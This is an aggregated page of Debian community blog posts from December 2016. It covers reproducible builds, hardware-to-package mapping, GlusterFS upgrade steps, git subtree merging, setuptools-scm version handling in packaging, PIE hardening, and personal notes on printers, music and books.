December 20, 2016

Reproducible builds folks

Reproducible Builds: week 86 in Stretch cycle

What happened in the Reproducible Builds effort between Sunday December 11 and Saturday December 17 2016:

Reproducible builds world summit

The 2nd Reproducible Builds World Summit was held in Berlin, Germany on December 13th-15th. The event was a great success with enthusiastic participation from an extremely diverse number of projects. Many thanks to our sponsors for making this event possible!

Reproducible Summit 2 in Berlin 2016

Whilst there is an in-depth report forthcoming, the Guix project have already released their own report.

Media coverage

Reproducible work in other projects

Documentation update

A large number of revisions were made to the website during the summit, including re-structuring existing content and creating a concrete plan to move the wiki content to the website:

Elsewhere in Debian

  • Chris Lamb submitted a patch for dak to preserve .buildinfo files on the local ftp-master filesystem. This is a temporary measure to prevent some "historical" data loss; the files are currently being silently discarded.

Packages reviewed and fixed, and bugs filed

Chris Lamb:

Daniel Shahaf:

Reiner Herrmann:

Reviews of unreproducible packages

9 package reviews have been added, 19 have been updated and 17 have been removed in this week, adding to our knowledge about identified issues.

3 issue types have been added:

One issue type was updated:

Weekly QA work

During our reproducibility testing, some FTBFS bugs have been detected and reported by:

  • Chris Lamb (9)

diffoscope development

reprotest development

trydiffoscope development

  • trydiffoscope was split from the main diffoscope repository by Chris Lamb so that the two projects can be released independently and so that trydiffoscope can more easily be available on PyPI. It also simplifies the diffoscope packaging.

  • trydiffoscope 64 was uploaded to unstable by Chris Lamb.

Misc.

This week's edition was written by Chris Lamb and reviewed by a bunch of Reproducible Builds folks on IRC and via email.

20 December, 2016 07:31PM

hackergotchi for Mario Lang

Mario Lang

Squarepusher's Shobaleader One

I recently was lucky enough to see one of my long-time favourite drum and bass artists live! Squarepusher! I know and love his music since the late 90s.

My girlfriend got us tickets for the Shobaleader One performance at Progy & Bess in Vienna. It was fantastic! 90 minutes of high energy jazz.

As a personal memory, I captured one of my favourite Squarepusher tracks, Cooper's World. This is another case of #unseenphotography.

While I am usually not very much into jazz, I like this fusion of dnb and jazz very much.

20 December, 2016 11:07AM by Mario Lang

Petter Reinholdtsen

Isenkram updated with a lot more hardware-package mappings

The Isenkram system I wrote two years ago to make it easier in Debian to find and install packages to get your hardware dongles to work, is still going strong. It is a system to look up the hardware present on or connected to the current system, and map the hardware to Debian packages. It can either be done using the tools in isenkram-cli or using the user space daemon in the isenkram package. The latter will notify you, when inserting new hardware, about what packages to install to get the dongle working. It will even provide a button to click on to ask packagekit to install the packages.

Here is an command line example from my Thinkpad laptop:

% isenkram-lookup  
bluez
cheese
ethtool
fprintd
fprintd-demo
gkrellm-thinkbat
hdapsd
libpam-fprintd
pidgin-blinklight
thinkfan
tlp
tp-smapi-dkms
tp-smapi-source
tpb
%

It can also list the firware package providing firmware requested by the load kernel modules, which in my case is an empty list because I have all the firmware my machine need:

% /usr/sbin/isenkram-autoinstall-firmware -l
info: did not find any firmware files requested by loaded kernel modules.  exiting
%

The last few days I had a look at several of the around 250 packages in Debian with udev rules. These seem like good candidates to install when a given hardware dongle is inserted, and I found several that should be proposed by isenkram. I have not had time to check all of them, but am happy to report that now there are 97 packages packages mapped to hardware by Isenkram. 11 of these packages provide hardware mapping using AppStream, while the rest are listed in the modaliases file provided in isenkram.

These are the packages with hardware mappings at the moment. The marked packages are also announcing their hardware support using AppStream, for everyone to use:

air-quality-sensor, alsa-firmware-loaders, argyll, array-info, avarice, avrdude, b43-fwcutter, bit-babbler, bluez, bluez-firmware, brltty, broadcom-sta-dkms, calibre, cgminer, cheese, colord, colorhug-client, dahdi-firmware-nonfree, dahdi-linux, dfu-util, dolphin-emu, ekeyd, ethtool, firmware-ipw2x00, fprintd, fprintd-demo, galileo, gkrellm-thinkbat, gphoto2, gpsbabel, gpsbabel-gui, gpsman, gpstrans, gqrx-sdr, gr-fcdproplus, gr-osmosdr, gtkpod, hackrf, hdapsd, hdmi2usb-udev, hpijs-ppds, hplip, ipw3945-source, ipw3945d, kde-config-tablet, kinect-audio-setup, libnxt, libpam-fprintd, lomoco, madwimax, minidisc-utils, mkgmap, msi-keyboard, mtkbabel, nbc, nqc, nut-hal-drivers, ola, open-vm-toolbox, open-vm-tools, openambit, pcgminer, pcmciautils, pcscd, pidgin-blinklight, printer-driver-splix, pymissile, python-nxt, qlandkartegt, qlandkartegt-garmin, rosegarden, rt2x00-source, sispmctl, soapysdr-module-hackrf, solaar, squeak-plugins-scratch, sunxi-tools, t2n, thinkfan, thinkfinger-tools, tlp, tp-smapi-dkms, tp-smapi-source, tpb, tucnak, uhd-host, usbmuxd, viking, virtualbox-ose-guest-x11, w1retap, xawtv, xserver-xorg-input-vmmouse, xserver-xorg-input-wacom, xserver-xorg-video-qxl, xserver-xorg-video-vmware, yubikey-personalization and zd1211-firmware

If you know of other packages, please let me know with a wishlist bug report against the isenkram-cli package, and ask the package maintainer to add AppStream metadata according to the guidelines to provide the information for everyone. In time, I hope to get rid of the isenkram specific hardware mapping and depend exclusively on AppStream.

Note, the AppStream metadata for broadcom-sta-dkms is matching too much hardware, and suggest that the package with with any ethernet card. See bug #838735 for the details. I hope the maintainer find time to address it soon. In the mean time I provide an override in isenkram.

20 December, 2016 10:55AM

hackergotchi for Mario Lang

Mario Lang

Upgrading GlusterFS from Wheezy to Stretch

We are about to upgrade one of our GlusterFS-based storage systems at work. Fortunately, I was worrying about the upgrade procedure for the Debian packages not being tested by the maintainers. It turns out I was right. Simply upgrading the packages without manual intervention will apparently render your GlusterFS server unusable.

Basic setup

I have only tested the most basic distributed GlusterFS setup. No replication whatsoever. We have two GlusterFS servers, storage1 and storage2. A peering between both has been established, and a very basic volume has been configured:

storage1:~# gluster
gluster> peer status
Number of Peers: 1

Hostname: storage2
Uuid: 2d22cc13-2252-4cf1-bfe9-3d27fa2fbc29
State: Peer in Cluster (Connected)
gluster> volume create data storage1:/srv/data storage2:/srv/data
...
gluster> volume start data
...
gluster> volume info

Volume Name: data
Type: Distribute
Volume ID: e2bd5767-4b33-4e57-9320-91ca76f52d56
Status: Started
Number of Bricks: 2
Transport-type: tcp
Bricks:
Brick1: storage1:/srv/data
Brick2: storage2:/srv/data

For the test setup, I populated the volume with a number of files.

Upgrading from Wheezy to Jessie

To be save, stop the volume before you begin with the package upgrade:

gluster> volume stop data

And now perform your dist-upgrade.

After the upgrade, you will have to perform two manual clean ups. Both actions have to be performed on all storage servers.

/etc/glusterd is now /var/lib/glusterd

The package maintainers have apparently neglected to take care of this one. You manually need to copy the old configuration files over.

storage1:~# cd /var/lib/glusterd && cp -r /etc/glusterd/* .

Put volume-id in extended attribute

GlusterFS 3.5 requires the volume-id in an extended directory attribute. This is also not automatically handled during package upgrade.

storage1:~# vol=data
storage1:~# volid=$(grep volume-id /var/lib/glusterd/vols/$vol/info | cut -d= -f2 | sed 's/-//g')
storage1:~# setfattr -n trusted.glusterfs.volume-id -v 0x$volid /srv/data

With these two steps performed on all GlusterFS servers, you should now be able to start and mount your volume again in Debian Jessie.

Do not forget to explicitly stop the volume again before continueing with the next upgrade step.

Upgrading from Jessie to Stretch

After you have dist-upgraded to Stretch, there is yet another manual step you have to take to convert the volume metadata to the new layout in GlusterFS 3.8. Make sure you have stopped your volumes and the GlusterFS server.

storage1:~# service glusterfs-server stop

Now run the following command:

storage1:~# glusterd --xlator-option *.upgrade=on -N

Now you should be ready to start your volume again:

storage1:~# service glusterfs-server start
storage1:~# gluster
gluster> volume start data

And mount it:

client:~# mount -t glusterfs storage1:/data /mnt

You should now be running GlusterFS 3.8 and your files should still all be there.

20 December, 2016 10:50AM by Mario Lang

hackergotchi for Thorsten Glaser

Thorsten Glaser

How to use the subtree git merge strategy

This article might be perceived as a blatant ripoff of this Linux kernel document, but, on the contrary, it’s intended as add-on, showing how to do a subtree merge (the multi-project merge strategy that’s actually doable in a heterogenous group of developers, as opposed to subprojects, which many just can’t wrap their heads around) with contemporary git (“stupid content tracker”). Furthermore, the commands are reformatted to be easier to copy/paste.

To summarise: you’re on the top level of a checkout of the project into which the “other” project (Bproject) is to be merged. We wish to merge the top level of Bproject’s “master” branch as (newly created) subdirectory “dir-B” under the current project’s top level.

	$ git remote add --no-tags -f Bproject /path/to/B/.git
	$ git merge -s ours --allow-unrelated-histories --no-commit Bproject/master
	$ git read-tree -u --prefix=dir-B/ Bproject/master
	$ git commit -m 'Merge B project as our subdirectory dir-B'

	Later updates are easy:
	$ git pull -s subtree Bproject master
 

(mind the trailing slash after dir-B/ on the read-tree command!)

Besides reformatting, the use of --allow-unrelated-histories recently became necessary. --no-tags is also usually what you want, because tags are not namespaced like branches.

Another command you might find relevant is how to clean up orphaned remote branches:

	$ for x in $(git remote); do git remote prune "$x"; done
 

This command locally deletes all remote branches (those named “origin/foo”) that have been deleted on the remote side.

Update: Natureshadow wishes you to know that there is such a command as git subtree which can do similar things to the subtree merge strategy explained above, and several more related things. It does, however, need the præfix on every subsequent pull.

20 December, 2016 10:36AM by MirOS Developer tg ([email protected])

Mike Hommey

Announcing git-cinnabar 0.4.0 release candidate 2

Git-cinnabar is a git remote helper to interact with mercurial repositories. It allows to clone, pull and push from/to mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.4.0rc?

  • /!\ Warning /!\ If you have been using a version of the release branch between 0.4.0rc and 0.4.0rc2 (more precisely, in the range 0335aa1432bdb0a8b5bdbefa98f7c2cd95fc72d2^..0.4.0rc2^), and used git cinnabar download and run on Mac or Windows, please run git cinnabar download again with this version and then ensure your mercurial clones have not been corrupted by case-sensitivity issues by running git cinnabar fsck --manifests. If they contain sha1 mismatches, please reclone.
  • Updated git to 2.11.0 for cinnabar-helper
  • Improvements to the git cinnabar download command
  • Various small code cleanups
  • Improvement to the experimental support for pushing merges

20 December, 2016 09:06AM by glandium

December 19, 2016

Mike Gabriel

[Arctica Project] Release of nx-libs (version 3.5.99.3)

Introduction

NX is a software suite which implements very efficient compression of the X11 protocol. This increases performance when using X applications over a network, especially a slow one.

NX (v3) has been originally developed by NoMachine and has been Free Software ever since. Since NoMachine obsoleted NX (v3) some time back in 2013/2014, the maintenance has been continued by a versatile group of developers. The work on NX (v3) is being continued under the project name "nx-libs".

Release Announcement

On Monday, Dec 19th, version 3.5.99.3 of nx-libs has been released [1].

This release brings another major backport of libNX_X11 (to the status of X.org's libX11 1.6.4, i.e. latest HEAD) and also a major backport of the xtrans library (status of latest HEAD at X.org, as well). This big chunk of work has again been performed by Ulrich Sibiller. Thanks for your work on this.

This release is also the first version of nx-libs (v3) that has dropped nxcompext as shared library. We discovered that shipping nxcompext as shared library is a big design flaw as it has to be be built against header files private to the Xserver (namely, dix.h). Conclusively, code from nxcompext was moved into the nxagent DDX [2].

Furthermore, we worked again and again on cleaning up the code base. We dropped various files from the Xserver code shipped in nx-libs and various compilier warnings have been amended.

In the upstream ChangeLog you will find some more items around code clean-ups and .deb packaging, see the diff [3] on the ChangeLog file for details.

A very special and massive thanks to all major contributors, namely Ulrich Sibiller, Mihai Moldovan and Vadim Troshchinskiy. Well done!!! Also a special thanks to Vadim Troshchinskiy for fixing some regressions in nxcomp introduced by the Unix socketeering support.

Change Log

A list of recent changes (since 3.5.99.2) can be obtained from here.

Known Issues from 3.5.99.2 (solved in 3.5.99.3)

This version of nx-libs now works fine again with LDFLAGS / CFLAGS having the -pie / -fPIE hardening flags set.

Binary Builds

You can obtain binary builds of nx-libs for Debian (jessie, stretch, unstable) and Ubuntu (trusty, xenial) via these apt-URLs:

Our package server's archive key is: 0x98DE3101 (fingerprint: 7A49 CD37 EBAE 2501 B9B4 F7EA A868 0F55 98DE 3101). Use this command to make APT trust our package server:

 wget -qO - http://packages.arctica-project.org/archive.key | sudo apt-key add -

The nx-libs software project brings to you the binary packages nxproxy (client-side component) and nxagent (nx-X11 server, server-side component).

Ubuntu developers, please note: we have added nightly builds for Ubuntu latest to our build server. This has been Ubuntu 16.10 so far, but we will soon drop 16.10 support in nightly builds and add 17.04 support.

References

19 December, 2016 02:39PM by sunweaver

hackergotchi for Norbert Preining

Norbert Preining

I. J. Parker – The Dragon Scroll

Very enthralling and entertaining criminal story set in the 11th century Japan, the starting point of a series of novels around Sugawara Akitada (菅原 顕忠), a fictional official/scholar in the Heian period who solves several difficult cases using his great balance of knowledge and common sense.

Akitada is sent to the far north (nowadays around Chiba) to check what has happened to the last three tax convoys that never appeared in the capital. He pokes around and unravels a involved plot to overthrow law and order. A few love stories, dead ends, and lots over wandering around brings the story to a wild finish.

The first book in the Akitada series reads very smoothly and quickly, never boring. It gives nice fews onto the society as imagined by the (scholarly) author, and somehow manages to transfer the feeling of living in this area to the reader.

For those with interest in criminal stories and Japan, it is a very recommendable book.

19 December, 2016 11:32AM by Norbert Preining

hackergotchi for Chris Lamb

Chris Lamb

10 years of Debian

Today marks the 10-year anniversary of my first contribution to Debian GNU/Linux.

I will not recount the full history here but my first experience with Debian was a happy accident. I had sent off for a 5-CD set of Red Hat from The Linux Emporium only to discover I lacked the required 12MB of RAM. Annoyed, I reached for the Debian "potato" CD that was included gratis in my order due to it being outdated at the time…

Fast-forwarding a few years, whilst my first contribution was trivial, it was Thomas Bushnell's infectious enthusiasm that led me to contribute more, eventually becoming a Google Summer of Code student under Daniel Baumann, and finally becoming an official Debian Developer in September 2008 with Thomas Viehmann as my Application Manager. (Some things may never change, however I still struggle with the bug tracker's control@ interface.)


The response I got to my patch always reminds me of the irrational power of providing attibution. I've always liked to tell myself I'm above such vanities but perhaps the truly mature approach would be to accept that ego is part of the human condition and—as a community—take steps to avoid handicapping ourselves by underestimating the value of "trivialities" such as having one's name listed.

I've since been fascinated by the number of maintainers who do not attribute patches in changelogs, especially from newcomers or when the changes are non-trivial — a handful in particular have stung me fairly deeply.

I would certainly concede that it adds nothing technical and can even be distracting, but it seems a reasonable concession that dramatically increases the chance of future efforts or, frankly, is simply a kindly gesture of thanks and good will. Given our level of technical expertise, I fear we regularly suffer from not having sufficient empathy for newcomers or first-time users who lack the context or orientation that we possess.

Anyway, here's to another ten…

19 December, 2016 11:27AM

Hideki Yamane

considering package delta


From Android Developers Blog: Saving Data: Reducing the size of App Updates by 65%

We should consider providing delta package, especially update packages from security.debian.org, IMO.

19 December, 2016 05:06AM by Hideki Yamane ([email protected])

December 18, 2016

hackergotchi for Jonathan McDowell

Jonathan McDowell

Timezones + static blog generation

So, it turns out when you move to static blog generation and do the generation on your laptop, which is usually in the timezone you’re currently physically located, it can cause URLs to change. Especially if you’re prone to blogging late at night, which can result in even just a shift to DST changing things. I’ve forced jekyll to UTC by adding timezone: 'UTC' to the config, and ensuring all the posts now have timezones for when they were written (a lot of the imported ones didn’t), so hopefully things should be stable from here on.

18 December, 2016 11:28PM

Iustin Pop

Printer fun

Had some printer fun this week. It was fun in the sense that failure modes are interesting, not that there was much joy in the process.

My current document printer is an HP that I bought back in early 2008; soon 9 years old, that is. When I got the printer I was quite happy: it supports Postscript, it supports memory extension (which allowed me to go from the built-in 64MB to a whopping 320MB), it is networked and has automatic duplex. Not good for much more than document printing, but that it did well. I didn't print a lot on it (averaged it was well below the recommended monthly limit), which might explain the total trouble-free operation, but I did change the toner cartridges a couple of times.

The current cartridges were running low for a while, but I didn't need to change them yet. As I printed a user manual at the beginning of the week (~300+ pages in total), I ran out of the black half-way through. Bought a new cartridge, installed it, and the first strange thing was that it still showed “Black empty - please replace”.

I powered the printer off and turned it on again (the miracle cure for all IT-related things), and things seemed OK, so I restarted printing. However, this time, the printer was going through 20-30 pages, and then was getting stuck in "Printing document" with green led blinking. Waited for 20 minutes, nothing. So cancel the job (from the printer), restart printing, all fine.

The next day I wanted to print a single page, and didn't manage to. Checked that the PDF is normal, checked an older PDF which I printed successfully before, nothing worked. Changed drivers, unseated & re-seated the extra memory, changed operating systems, nothing. Not even the built-in printer diagnostic pages were printing.

The internet was all over with "HP formatter issues"; apparently some HP printers had "green" (i.e. low-quality) soldering, and were failing after a while. But people were complaining about 1-2-4 years, not 9 that my printer worked, and it was very suspicious that all troubles started after my cartridge replacement. Or, more likely, due to the recent sudden increase in printing.

Given that formatter board fixes (bake in the oven for N minutes at a specific temperature to reflow the soldering) are temporary and that you can't find replacement parts for this printer, I started looking for a new printer. To my surprise (and dismay at the waste that capitalism produces), a new printer from a higher class was cheaper than replacing all 4 cartridges in my printer. So I had a 90% full black cartridge that I couldn't reuse, but I'd get a new printer for not much more.

Interestingly, in 9 years, the development was:

  • In the series of printers that I had (home office use), one can't get a Ethernet-only networked duplex printer; the M252 series has only an 'n' variant (Ethernet only, no duplex), or 'dw' variant (Ethernet, WiFi, Duplex); if one wants duplex but no WiFi, it's available only in the next series, the M452.
  • The CPU speeds increased 2-3× and memory capacity by 2-4×; however, memory or font expansion is no longer possible.
  • The M252 series still uses Fast Ethernet (which is enough and consumes less power), whereas the M452 series has Gigabit.
  • It seems the cartridges come in two different capacities, but basically colour laser printers still employ the same 4-colour cartridge set (compare to photo printers at 9+).
  • I did just a brief examination of the market, but for home use, it seems the recommendation is still HP for no-troubles use or other brands for cheaper costs. Of course it varies a lot in reviews, but this is what I understood from forums; maybe I'm biased.
  • There was no increase in real resolution; the native grid is still 600dpi (photo inkjet printers are also stuck at 360/720 native for a while), but the ImageRet software processing seems to have advanced (from what the white-papers say).
  • Print speed however has visibly increased; still the same 2-3× increase, but this is wall-clock speed increase, whereas the CPU/memory is less relevant.

I was however happy that one can still get OS-independent (Postscript), networked printers that are small enough for home use and don't (necessarily) come with WiFi.

However, one thing still bothered me: did I have such problems because the printer died of overwork at old age, or was it related to the cartridge change? So I start searching again, and I find a post on a forum (oh Google, why did you remove "forum search" and replaced it with "language level"?) that details a hidden procedure to format the internal storage of the printer, exactly for my printer model, exactly for my symptoms. Huh, I will lose page count, but this is worth a try…

So I do press the required keys, I see the printer booting and saying "erasing…", then asking for language, which makes me happy because it seems the forum post was correct in one regard. I confirm English, the printer reboots once more, and then when it comes up it warns me: "Yellow cartridge is a non-HP original, please confirm". I get confused, and re-seat all cartridges, to no avail. Yellow is non-HP. Sigh, maybe that cartridge had something that confused the printer? When I visit its web page however, all cartridges except the newly installed black one are marked as Non-HP; this only means that I can't see their remaining toner level, but otherwise—the printer is restored back to life. I take the opportunity to also perform a firmware upgrade (only five years newer firmware, but still quite old), but this doesn't solve the Non-HP message.

The printer works now, and I'm left wondering: was this all a DRM-related failure, something like new cartridge chip which had some new code that confused the printer so bad it needed reformatting, at which point the old cartridge code is no longer supported (for whatever reason)? Was it just a fluke, unrelated to DRM? Was the problem that I powered off the printer soon after replacing the cartridge, while it was still doing “something” (e.g. preparing to do a calibration after the change)?

And another, more practical question: I have 3 cartridges to replace still; they were at 10% before this entire saga, and I'm not able to see their level anymore, but they'll get down to empty soon. The black cartridge in the printer is already at 77%, which is surprising as I didn't print that much. So should I replace the cartridges on what is a possibly fully functional, but also possibly a dying printer? Or buy a new one for slightly more, throwing out possibly good hardware?

Even though I understand the business reason behind it, I hate the whole concept of "the printer is free, you pay for the ink". Though in my case "free" didn't mean bad, as a lifetime of 9 years is good enough for a printer.

18 December, 2016 10:58PM

Daniel Stender

How to cheat setuptools-scm (Debian diary)

[2016-12-19: some additions]

This is another little issue from Python packaging for Debian which I came across lately packaging the compressed NumPy based data container Bcolz. Upstream uses setuptools-scm to determine the software’s version during build time from the source code management environment the code is in. This method is convenient for the upstream development because with that the version number doesn’t need to be hard-coded, and often people just forget to update that (and other version carrying files like doc/conf.py) when a new version of a project is released.

python-setuptools just needs to be added to the setup.py to do its job, and in Bcolz the code goes like this:

setup(
    name="bcolz",
    use_scm_version={
        'version_scheme': 'guess-next-dev',
        'local_scheme': 'dirty-tag',
        'write_to': 'bcolz/version.py'

The file the version number is written to is bcolz/version.py. This file isn’t in the upstream code revision nor in the tarball which was released by the upstream developers, it’s always generated during build time.

In Debian there is an error if you try to build a package from a source tree which contains files which aren’t to be found in the corresponding tarball, like cruft from a previous build, or if any files have changed – therefore every new package should be test build also twice in a row in a non-chroot environment. Generally there a two ways to solve this, either you add cruft to debian/clean, or you add the file resp. a matching file pattern to extend-diff-ignore in debian/source/options. Which method is the better one could be discussed, I’m generally using the clean option if something isn’t in the upstream tarball, and the source/options solution if something is already in the upstream tarball, but gets changed during a build. This is related to your preferred Git procedures, if you remove a file which is in the upstream tarball these removals have to be checked in separately, and that means everytime a new upstream tarball is released – that is not very convenient. Another option which is available is to strip certain files from the upstream tarball by putting them on the Files-Excluded in deb/copyright. By the way, the same complex applies to egg-info/: that folder is shipped or is not shipped in the upstream tarball, and files in that folder get changed during build.

When the source code is put into a Git environment for Debian packaging, there could be problems with the version number setuptools-scm comes up with. This setuptools extension gets the recent version from the latest Git tag when there is a version number to be found, and that’s all right. In Git environments for Debian packaging (like e.g. of the Debian Science group, the Python groups and the others) that is available, like the commonly used upstream tags have that1. The problem is, sometimes the upstream version which Debian has2 doesn’t match the original upstream version number which is wanted for version in bcolz/version.py. For example, the suffix +ds is used if the upstream tarball has been stripped from prebuild files or embedded convenience shipments (like it’s the case with the Bcolz package where c-blosc/ has been stripped because that’s build for another package), of the suffix “+dfsg” shows that non-DFSG free software has been removed (which can’t be distributed through the main archive section). For example, the version string for Bcolz which is found after the build currently (1.1.0+ds1-1) is 1.1.0+ds1:

# coding: utf-8
# file generated by setuptools_scm
# don't change, don't track in version control
version = '1.1.0+ds1'

But that’s not wanted because this version never has been released, but appears everywhere:

$ pip list | grep bcolz
bcolz (1.1.0+ds1)
$ python3 -c 'import bcolz; bcolz.print_versions()'
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
bcolz version:     1.1.0+ds1

There are several different ways how to fix this. The one “with the crowbar” (like said in German) is to patch use_scm_version out from setup.py, but if you don’t provide any version in exchange the version number which is used by Setuptools then is 0.0.0. The upstream version could be hard-coded into the patch, but then again it has not to be forgotten to update it manually by the maintainer, which is not very convenient. Plus, setup.py could change and the patch then might need to be unfuzzed, thus more work. Bad.

A patch could be spared by manipulating and exporting the SETUPTOOLS_SCM_PRETEND_VERSION environment variable for setuptools-scm in debian/rules, which is sometimes used when I see the returns for that string on Debian Code Search. But how to prevent to hard code the version number, here? The dpkg-dev package (pulled by build-essential) ships a Makefile snippet /usr/share/dpkg/pkg-info.mk which could be included into debian/rules. It defines several variables which are useful for packaging, like DEB_SOURCE contains the source package name, they are extracted from debian/changelog. But, DEB_VERSION_UPSTREAM which is available through that puts out the upstream version without epoch and Debian revision, but it’s not getting any finer grained out of the box.

For a custom fix, a regular expression which removes the +... extensions (if present) from the bare upstream version string would be s/\+[^+]*//:

$ echo "1.1.0+ds1" | sed -e 's/\+[^+]*//'
1.1.0
$ echo "1.1.0" | sed -e 's/\+[^+]*//'
1.1.0
$ echo "1.1.0+dfsg12" | sed -e 's/\+[^+]*//'
1.1.0

With that, a custom variable VERSION_UPSTREAM could be set on the top of DEB_VERSION_UPSTREAM (from pkg-info-mk) in debian/rules:

include /usr/share/dpkg/pkg-info.mk
VERSION_UPSTREAM = $(shell echo '$(DEB_VERSION_UPSTREAM)' | sed -e 's/\+[^+]*//')
export SETUPTOOLS_SCM_PRETEND_VERSION = $(VERSION_UPSTREAM)

Bam, that works (see the commit here):

# coding: utf-8
# file generated by setuptools_scm
# don't change, don't track in version control
version = '1.1.0'

An addition, I’ve seen that dh-python also takes care of SETUPTOOLS_SCM_PRETEND_VERSION since 2.20160609. The environment variable is set by the Debhelper build system if python{3,}-setuptools-scm is among the build-dependencies in debian/control. The perl code for that is in dh/pybuild.pm. I think the version number string above comes from dh-python’s pretended version, and not from any of the Git tags (which are currently debian/1.1.0+ds1-1 and upstream/1.1.0+ds1).


  1. For Git in Debian packaging, e.g. see the DEP-14 proposal (Recommended layout for Git packaging repositories): http://dep.debian.net/deps/dep14/ [return]
  2. Following the scheme for package versions “[epoch:]upstream_version[-debian-revision]” [return]

18 December, 2016 09:56PM

hackergotchi for Sean Whitton

Sean Whitton

progpoking

Programming by poking: why MIT stopped teaching SICP

Perhaps there is a case for CS programs keeping pace with workplace technological changes (in addition to developments in the academic field of CS), but it seems sad to deprive undergrads of deeper knowledge about language design.

18 December, 2016 09:34PM

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RcppArmadillo 0.7.600.1.0

armadillo image

Earlier this week, Conrad released Armadillo 7.600.1. The corresponding RcppArmadillo release 0.7.600.1.0 is now on CRAN and in Debian. This follows several of rounds testing at our end with a full reverse-dependency of a pre-release version followed by another full reverse-depency check. Which was of course followed by CRAN testing for two more days.

Armadillo is a powerful and expressive C++ template library for linear algebra aiming towards a good balance between speed and ease of use with a syntax deliberately close to a Matlab. RcppArmadillo integrates this library with the R environment and language--and is widely used by (currently) 298 other packages on CRAN -- an increase of 24 just since the last CRAN release of 0.7.500.0.0 in October!

Changes in this release relative to the previous CRAN release 0.7.500.0.0 are as follows:

Changes in RcppArmadillo version 0.7.600.1.0 (2016-12-16)

  • Upgraded to Armadillo release 7.600.1 (Coup d'Etat Deluxe)

    • more accurate eigs_sym() and eigs_gen()

    • expanded floor(), ceil(), round(), trunc(), sign() to handle sparse matrices

    • added arg(), atan2(), hypot()

Changes in RcppArmadillo version 0.7.500.1.0 (2016-11-11)

  • Upgraded to Armadillo release 7.500.1

  • Small improvement to return value treatment

  • The sample.h extension was updated to the newer Armadillo interface. (Closes #111)

Courtesy of CRANberries, there is a diffstat report. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

18 December, 2016 02:44PM

Mike Gabriel

Free Your Phone, Free Yourself, Get Sponsored for your Work

TL;DR; This is a call to every FLOSS developer interested in working towards Free Software driven mobile phones, esp. targetting the Fairphone 2. If your only show stopper is lack of development hardware or lack of financial support, please go on reading below.

As I see it, the Fairphone 2 will be (or already is) the FLOSS community platform on the mobile devices market. Regularly, I get new notice about people working on this or that OS port to the FP2 hardware platform. The combination of a hardware-wise sustainably maintained mobile phone platform and a Free (or sort-of-Free) operating system being ported to it, makes the Fairphone 2 a really attractive device.

Personally, I run Sailfish OS on my Fairphone 2. Some weeks ago, I got contacted by one of my sponsors letting me know that he got involved in setting up an initiative that works on porting the Ubuntu Table/Phone OS to FP2. That very project is in need of more developers. Possibly, it needs exactly YOU!!!

So, if you are a developer that meets one or more of the below requirements and are interested in working in a highly motivated team, please get in touch with the UT4FP [1] project (skill requirements taken from the UT4FP website):

  • Expert knowledge on Android Build System (AOSP / Cyanogenmod);
  • Experience in porting devices to Android;
  • Knowledge of build-up of systems like Ubuntu Touch, SailfishOS, Firefox OS;
  • Knowledge of or understanding the Ubuntu Touch build system and the available manifests: UBports, but also phablet.ubuntu.com;
  • Experience with Git / repo C/C++ experience for (potentially) customizing code• Reverse engineering → Debugging individual components on the basis of logcat, dmesg, syslog, strace (Boot, Graphics, Camera, GPS, Wifi etc.);
  • Debugging build errors and adjusting (Android) Makefiles;
  • Building a devicetree or migrating an existing devicetree for the purpose of a successful build;
  • Knowing where to find which components. (i.e. GitHub, CAF, Vendortrees (blobs));
  • Knowing how to patch a kernel and how to port AppArmor;
  • You know how to document each step and are willing to make all codes and adjustments available.

My sponsor offers to send out FP2 devices to (seriously) interested developers and if needed, he can also back up developers financially. If you are interested, please get in touch with me (and I'll channel you through...) via IRC (on the OFTC or Freenode network).

light+love
Mike (aka sunweaver on IRC)

[1] https://www.ut4fp.org/

18 December, 2016 01:40PM by sunweaver

hackergotchi for Bálint Réczey

Bálint Réczey

Hardening Debian Stretch with PIE is ready but bindnow will be missing

pie-bindnow-notnow-debianHardening all executables by making them position independent by default is basically ready with a few packages to fix (bugs). On the other hand bindnow is not enabled globally (#835146) and it seems it will not be for the next stable release despite my plan :-(.

If you are a maintainer you can still have your packages hardened in Stretch by enabling bindnow per package before 25 January, 2017. It could be a nice present for your users!

update: It is nice to see how enabling PIE in GCC increased PIE coverage while bindnow coverage is improving slowly with maintainers enabling it package by package:

lintian-pie

From https://lintian.debian.org/tags/hardening-no-pie.html

lintian-no-bindnow

From: https://lintian.debian.org/tags/hardening-no-bindnow.html

update 2: Changed the deadline of enabling bindnow per package to align with the start of the full freeze, not the soft freeze.

 

18 December, 2016 10:28AM by Réczey Bálint

hackergotchi for Johannes Schauer

Johannes Schauer

Looking for self-hosted filesharing software

The owncloud package was removed from Debian unstable and testing. I am thus now looking for an alternative. Unfortunately, finding such replacement seems to be harder than I initially thought, even though I only use a very small subset of what owncloud provides. What I require is some software which allows me to:

  1. upload a directory of files of any type to my server (no "distributed" filesharing where I have to stay online with my laptop)
  2. share the content of that directory via HTTP (no requirement to install any additional software other than a web browser)
  3. let the share-links be private (no possibility to infer the location of other shares)
  4. allow users to browse that directory (image thumbnails or a photo gallery would be nice)
  5. allow me to allow anonymous users to upload their own content into that directory (also only requiring their web browser)
  6. already in Debian or easy to package and maintain due to low complexity (I don't have enough time to become the next "owncloud maintainer")

I thought this was a pretty simple task to solve but I am unable to find any software that fits above criteria.

The below table shows the result of my research of what's currently available. The columns mark whether the respective software fulfills one of the six criteria from above.

Software 123456
owncloud
sparkleshare
dvcs-autosync
git annex assistant
syncthing
pydio
seafile
sandstorm.io
ipfs
bozon
droppy

Pydio, seafile and sandstorm.io look promising but they seem to be beasts similar in complexity to owncloud as they bring features like version tracking, office integration, wikis, synchronization across multiple devices or online editing of files which are features that I do not need.

I would already be very happy if there was a script which would make it easy to create a hard-to-guess symlink to a directory with data tracked by git annex under my www-root and then generate some static HTML to provide a thumbnails view or a photo gallery. Unfortunately, even that solution would not be sufficient as it would still disallow public upload by anybody whom I would give the link to...

If you know some software that meets my criteria or would like to submit corrections to above table, please shoot an email to [email protected]. Thanks!

18 December, 2016 10:18AM

December 17, 2016

hackergotchi for Shirish Agarwal

Shirish Agarwal

